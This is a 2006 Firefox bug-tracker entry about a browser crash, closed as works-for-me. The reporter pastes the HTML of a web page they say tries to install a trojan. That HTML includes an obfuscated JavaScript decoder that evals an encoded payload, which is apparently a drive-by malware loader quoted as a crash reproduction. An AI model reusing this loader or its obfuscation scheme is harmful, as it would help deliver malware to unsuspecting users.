Closed
Bug 352819
Opened 19 years ago
Closed 18 years ago
Crash with no feedback
Categories
(Firefox :: General, defect)
Tracking
()
RESOLVED
WORKSFORME
People
(Reporter: ue004206, Unassigned)
References
()
Details
(Keywords: crash)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Firefox literally disappears after javascript execution.
The url provided seems to try to install a virus (IE downloads an executable containing a trojan)
I've tryed both on Windows XP (with Firefox 1.5.0.6) and on Windows 2000 (with Firefox 1.5.0.7) with the same result
Reproducible: Always
Steps to Reproduce:
1. open url above or html file containing html code above
Actual Results:
Application disappears
Expected Results:
it should show an error
html below reproduces error:
<HTML><HEAD>
<BODY>
<SCRIPT LANGUAGE="Javascript">
function e(kI,d)
{
if(!d)
{
d='Cy*hc1aZ2!|WLD30J-H/gSr.BAVM9Ke_Etjp7vonI6O4#=i]zd);b?%FU@s+&G:^';
}
var L;
var cX='';
for(var g=0; g<kI.length; g+=arguments.callee.toString().replace(/\s/g,'').length-535)
{
L=(d.indexOf(kI.charAt(g))&255)<<18 |
(d.indexOf(kI.charAt(g+1))&255)<<12|
(d.indexOf(kI.charAt(g+2))&255)<<(arguments.callee.toString().replace(/\s/g,'').length-533)|
d.indexOf(kI.charAt(g+3))&255;
cX+=String.fromCharCode((L&16711680)>>16,(L&65280)>>8,L&255);
}
eval(cX.substring(0,cX.length-(arguments.callee.toString().replace(/\s/g,'').length-537)));
}
e('AaGpKr?vMnJiKF!6KagI!;d/J?!!g1JE/c13-?Sy-bgG276tKo1;BF!69ZJj21DHJ;bjVZ-b9hI]W%6;WnypAr2iB%L]Br-%A.!bV.66Mo9]Vr@7A.EiVZ-=MhG)ArBG!)=7M%D?MrSiK*@)ArAv9n!v9j#n2pU&W)94!FDp9ovzKhUn|/#E2*CE');
</SCRIPT>
<br>
PIPPO
</BODY></HTML>
Comment 1•19 years ago
|
||
WFM with Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20060914 BonEcho/2.0
And also Firefox 1.5.0.7 and Minefield show no problems.
If you experience a crash, could you provide a Talkback ID?
http://kb.mozillazine.org/Talkback
Comment 2•19 years ago
|
||
WFM - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a2pre) Gecko/20070110 Minefield/3.0a2pre ID:2007011004 [cairo]
Comment 3•18 years ago
|
||
works for me with Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9a6pre) Gecko/2007061504 Minefield/3.0a6pre and since we have no talkback id as requested (comment #1), closing as incomplete.
Luigi, when you still crash with a recent release like Firefox 2.0.0.4, feel free to reopen this bug. Please include then a Talkback ID from the crash.
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Keywords: crash
Resolution: --- → INCOMPLETE
Version: unspecified → 1.5.0.x Branch
| Reporter | ||
Comment 4•18 years ago
|
||
Now (Firefox 2.0.0.4) it works fine.
thanks to everybody
Resolution: INCOMPLETE → FIXED
Updated•18 years ago
|
Resolution: FIXED → WORKSFORME
You need to log in
before you can comment on or make changes to this bug.
Description
•